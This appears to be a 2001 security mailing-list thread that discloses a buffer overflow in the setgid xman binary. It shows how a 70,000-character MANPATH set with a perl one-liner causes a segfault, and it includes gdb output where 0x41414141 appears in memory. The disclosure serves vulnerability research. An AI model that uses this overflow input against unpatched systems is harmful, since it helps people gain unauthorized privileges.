Re: suid xman 3.1.6 overflows

[Matias Sedalo <s0t4ipv6 () shellcode com ar>]

The file /usr/X11R6/bin/xman isn't setuid in slackware 7.1/7.2/8.0
but...\

s0t4ipv6@gohan:~$ export MANPATH=`perl -e 'print "A" x 7000'`
s0t4ipv6@gohan:~$ xman
Xman Error: No manual pages found.
s0t4ipv6@gohan:~$ export MANPATH=`perl -e 'print "A" x 70000'`
s0t4ipv6@gohan:~$ xman
Segmentation fault
s0t4ipv6@gohan:~$ uname -a 
Linux gohan 2.4.5 #4 SMP Thu Jul 12 22:22:32 ART 2001 i686 unknown

================================================================
Matias Sedalo.______________________http://www.shellcode.com.ar/

On Wed, 11 Jul 2001, KF wrote:

> xman from at least X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic
> overflow 
>
> srtxg () chanae alphanet ch is noted as the packager of this RPM. I do not
> know 
> the author. 
>
> [root@linux lib]# ls -al `which xman`
> -rwxr-sr-x    1 root     man         41076 Jun 17  1998
> /usr/X11R6/bin/xman*
>
> [root@linux lib]# xman
> [root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
> [root@linux lib]# xman
> Xman Error: Could not allocate memory for manual sections.
>
> [root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
> [root@linux lib]# xman
> Segmentation fault
>
> [root@linux lib]# gdb xman
> GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
> (gdb) run
> Starting program: /usr/X11R6/bin/xman
> 0x4022fb66 in getenv () from /lib/libc.so.6
> (gdb) bt
> #0  0x4022fb66 in getenv () from /lib/libc.so.6
> #1  0x0804bc47 in _start ()
> #2  0x41414141 in ?? ()
> Cannot access memory at address 0x41414141
>
> (gdb) info registers
> eax            0xbffee784       -1073813628
> ecx            0x804fb29        134544169
> edx            0x805414c        134562124
> ebx            0x40328f2c       1077055276
> esp            0xbffec6fc       0xbffec6fc
> ebp            0xbffec714       0xbffec714
> esi            0x6      6
> edi            0x41414141       1094795585
> eip            0x4022fb66       0x4022fb66
>
> -KF